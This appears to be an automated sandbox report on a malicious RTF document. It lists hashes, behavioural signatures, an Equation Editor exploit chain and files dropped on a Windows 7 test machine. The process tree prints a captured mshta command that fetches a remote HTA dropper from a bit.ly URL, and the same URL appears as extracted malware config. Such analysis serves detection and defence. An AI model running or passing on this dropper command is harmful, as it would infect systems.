Analysis

  • max time kernel
    148s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    08/05/2024, 10:24

General

  • Target

    2468244fc39494e35606f5e7338c762d_JaffaCakes118.rtf

  • Size

    9KB

  • MD5

    2468244fc39494e35606f5e7338c762d

  • SHA1

    dac59f996d676d80abb579dd6fb90bfbab5af01a

  • SHA256

    572021fdac883f348011afdeb1e09eabdf804c1153cfb44eb828dce4cf86c910

  • SHA512

    f5422d13596dbb2ea7d2412c9d7ee9bd75f21c7f7c1d4b0436f6ec6ac56423847e16ed0875adc3d499a52743c9b353305af0d3236b9c83b38e509fd16a932493

  • SSDEEP

    48:m+tXaGkEgNMhlkGffffffffhffffffffffffkfxfUfVQbDSj3xM7fJLvIu9kJHDZ:mWaG3soWtLA9OgevMVyRmv

Score
10/10

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://bit.ly/2R9G0dd

Signatures

  • Blocklisted process makes network request 4 IoCs
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Launches Equation Editor 1 TTPs 1 IoCs

    Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.

  • Modifies Internet Explorer settings 1 TTPs 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2468244fc39494e35606f5e7338c762d_JaffaCakes118.rtf"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2144
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2028
    • C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      "C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      1⤵
      • Launches Equation Editor
      • Suspicious use of WriteProcessMemory
      PID:2556
      • C:\Windows\SysWOW64\msHtA.exe
        msHtA http://bit.ly/2R9G0dd &AAAAAAAAAAAAAAA C
        2⤵
        • Blocklisted process makes network request
        • Checks whether UAC is enabled
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        PID:2680
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2632
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2796
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2632 CREDAT:4142083 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:1500

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

      Filesize

      717B

      MD5

      822467b728b7a66b081c91795373789a

      SHA1

      d8f2f02e1eef62485a9feffd59ce837511749865

      SHA256

      af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

      SHA512

      bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3C428B1A3E5F57D887EC4B864FAC5DCC

      Filesize

      914B

      MD5

      e4a68ac854ac5242460afd72481b2a44

      SHA1

      df3c24f9bfd666761b268073fe06d1cc8d4f82a4

      SHA256

      cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f

      SHA512

      5622207e1ba285f172756f6019af92ac808ed63286e24dfecc1e79873fb5d140f1ceb7133f2476e89a5f75f711f9813a9fbb8fd5287f64adfdcc53b864f9bdc5

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

      Filesize

      68KB

      MD5

      29f65ba8e88c063813cc50a4ea544e93

      SHA1

      05a7040d5c127e68c25d81cc51271ffb8bef3568

      SHA256

      1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

      SHA512

      e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      1KB

      MD5

      a266bb7dcc38a562631361bbf61dd11b

      SHA1

      3b1efd3a66ea28b16697394703a72ca340a05bd5

      SHA256

      df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

      SHA512

      0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\FAD4B4A58D1C70E9468460E3A0754E47

      Filesize

      503B

      MD5

      b52205814e9d7e9fcba1b5a4d1982f53

      SHA1

      dc1eeb503f981eac670b48a4b2c79a4d7a1e5f9f

      SHA256

      c8b8489e3b994250f5f6da325fba8b682c3e887a587c2039cec9c731d49e5268

      SHA512

      182c1e67fbbb499fc69967c89ef256830abe277a81ef1e124a999e93f891034ca2bf0e06db92ab7304303c503003b30089216a5aefd123c9372a9da37a6e45d9

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

      Filesize

      192B

      MD5

      0e02690bdc31cbdb1d64394eba952ef1

      SHA1

      18b0403d3b471e40149d7d0e7b213332eccee997

      SHA256

      daeee8f7bcc476d51acddec97b1c22ff29534260bc66c1f9f18dc9c16e026b3f

      SHA512

      79b6b9834f8243c09600cb47c1d4d2322277beb76b6d3025d671bfbd6d48321668a6d0272dcdf36c5c04ed365d5e6592f68ce12da02d398a67039d346f81033c

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3C428B1A3E5F57D887EC4B864FAC5DCC

      Filesize

      252B

      MD5

      587f0e34e66a2785132320b072f77a74

      SHA1

      b295602c83da525ed24574f761df8ccf6010898e

      SHA256

      b63169c69f3a2bb12eb0a8275df086adc52c488b8eafa54cd73e9635f3a9d4e2

      SHA512

      324aeaf4a267fdbb8411e8a6c97156dac1bd36ab2263b9df8c94fc4da668f932ab738f5b61e73b7b45408a0981eb6dcf9e055ccc296f021a4d9c9fe5675f080e

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      d8818e046d7c18f58378529b143d870a

      SHA1

      5739dd19f319d946dc93a848d5d413527cfd8f36

      SHA256

      1497d860c82ef25cb2238038bcb2c954654f79a28a08736f47fcd9cd9334eaa0

      SHA512

      4ab85fb438a6ff4fad6201b382e899c8c875c9e5dfcf37d0557c95552f650f40ecb72fa243f5a958d8754b74a214f9e322a5de3090e4d56278c3e0722e511f66

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      07b68d39c59f29f00f292783077e7e01

      SHA1

      b848fecccd849779b35df29d65a6c4526d716206

      SHA256

      9c4e8e96f4625c0d278937434687340aab94c91c0529467f70601d28e5b712ba

      SHA512

      daaaf54b07362a14c31e5f24a1b82b3c93110fd890fcaaf4e043adb975091705afe623995382be21c92c33262ddf76477cc5113df541f9a1cc122734e5ecda93

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      0ed907c2a06971db6c8c51206d90826e

      SHA1

      e28bd18edec3cf4f1e0fcd38aa5be1cdfece24f6

      SHA256

      2142c0774d74555be78b7b14b1738d9e5fa506bc621e1718bdff0f2c815de04b

      SHA512

      750a2666e921e219adacbf485c63399824deafab0039c594418e87b16bd1a562d4cb30a13eae055ff4d8eab53896b8d0565a262c037794bbfa9eb8df046f17cd

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      3fb80c083941ab70961e0ccadb51295f

      SHA1

      338b3065c0d69a293dee1cbf2846114998a0343d

      SHA256

      94f18367a2fbf2865bfe7c55eb73ca6ce554d92eee5a543e03c55ae147e356b2

      SHA512

      308fb94a144f00a1fe7254f4327fc07dd52e954ee1a616bb9df6aa076857038d6fde0f45b9b428ab09ad3f1685d9f387c9f25959f3c33dfaa06dcfbcc83c9af8

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      c2210519fb37a57e9ab891a80a42d3d0

      SHA1

      405f6c5f8e2e95e5878ec2881e9486b8f83e33e6

      SHA256

      01703f82e5a7cc57fc805630b4f822a17a1950dc0aed4436016cc4d3f5ea923f

      SHA512

      37533a40571d706b15c7ef5b52cad7b32f167b09d8048202eebf50314f484da5e8731b64f4baee5fad521269fd02862a05d939746f45513bd51b76f53e4631da

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      776d2f63288208ca491501abed6a8569

      SHA1

      8adda42be6fc26e5deba127b979eef5109c76653

      SHA256

      a30b4b570c3a099f2eae3a0dcb44081afb129de924cb37460f07bc107141708c

      SHA512

      a33b5fed2e1249fad58cdde800e870f1ad7b211cec235f7428e038d0b18356a0919792e20316bf71da24881ec8dd4fc9c966b1925a02f27f02f923ceac0a5839

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      344B

      MD5

      eae4bd6756c9a4c9229e920d2325b945

      SHA1

      7a5a8f09c0da968ceb1617627e38f13e12e4a245

      SHA256

      2c493cd075565c7702966ace5ef7dca2f2284e7d79329a29be2f4ff53ae4aec0

      SHA512

      d4e70f5bef3ca7faa959650d2c198e306483c711c46f56aa3bb9667614945e8736f39e4f2feb67a5499f89e374757b20e6d937ca81686f43b3605dc7f88a865d

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

      Filesize

      242B

      MD5

      d611c1caee6c63d69be7b359232ef430

      SHA1

      d475410958eddccb59a61cc8ef8149681d1c70fe

      SHA256

      7c60a25e2d0b18f0456b6d4bb98d2dc6c5f9673055cc00c8e8f10cfc91c3d1e1

      SHA512

      aa41bb1ff728d0060346fe8dad8a6109c25509a2de9333571071baab1cb2da9efed61e7e4cc1ffe9acf1fd440d1f688bb125ff32fdcaa4794194b353f9f1a980

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FAD4B4A58D1C70E9468460E3A0754E47

      Filesize

      552B

      MD5

      7f51304a2ec0996712b20bb6092c5f75

      SHA1

      8bc7ccb22050fdc0a5dda5141fbab9fc3057e4b1

      SHA256

      b2956a397090090eb81bc837c6d25ecb7c3df9c2d5693b99e8f3b26bfb0500fe

      SHA512

      30b24ec5987ac1b6c51f2668ca90463abff3e091d460050cf51b4fa620b1ae37b1b4d1b696b75daff8bf37eccadb1a62aec647b29bfcf0a3b20bb19304f2a1eb

    • C:\Users\Admin\AppData\Local\Temp\Cab2221.tmp

      Filesize

      65KB

      MD5

      ac05d27423a85adc1622c714f2cb6184

      SHA1

      b0fe2b1abddb97837ea0195be70ab2ff14d43198

      SHA256

      c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d

      SHA512

      6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

    • C:\Users\Admin\AppData\Local\Temp\Tar1F16.tmp

      Filesize

      171KB

      MD5

      9c0c641c06238516f27941aa1166d427

      SHA1

      64cd549fb8cf014fcd9312aa7a5b023847b6c977

      SHA256

      4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f

      SHA512

      936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

    • C:\Users\Admin\AppData\Local\Temp\Tar24C9.tmp

      Filesize

      177KB

      MD5

      435a9ac180383f9fa094131b173a2f7b

      SHA1

      76944ea657a9db94f9a4bef38f88c46ed4166983

      SHA256

      67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

      SHA512

      1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

      Filesize

      20KB

      MD5

      797075c1063ad0490b334819a5a7f7db

      SHA1

      ce1e8f037ec37fdf38573f7b72372983d26141a7

      SHA256

      9cc5aad669fed6268da78ca662f6a93e7313f14872081ac9b3b274c754e8a00a

      SHA512

      58fa540637f57c175d012c8f3ebe2393196e4912e2f5632f7b5865fb0609fa6efb95553fdbb2251a8bc9801358d46272971d174663f519a01ea57d834fc736f5

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\35Z0IOWG.txt

      Filesize

      97B

      MD5

      7825c9f6ad055da430bfd551d9620a60

      SHA1

      b6dfcc3a4a82b0377638dce64ed37d61e48f6aff

      SHA256

      57c84fe6383f43de018e37a8941b3eb61b994680bcf5b4787fa2dc4446fb5258

      SHA512

      74b3643a506e0f05f55ec88e8f0191daa34c58ae7be013dba90eae0a30873da2225815d4f7b81b2938eb2f90ca32f58a0bba3527236e259de0b8c740535a6716

    • memory/2144-53-0x00000000716AD000-0x00000000716B8000-memory.dmp

      Filesize

      44KB

    • memory/2144-0-0x000000002FC91000-0x000000002FC92000-memory.dmp

      Filesize

      4KB

    • memory/2144-2-0x00000000716AD000-0x00000000716B8000-memory.dmp

      Filesize

      44KB

    • memory/2144-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2144-657-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2680-29-0x0000000002F80000-0x0000000002F82000-memory.dmp

      Filesize

      8KB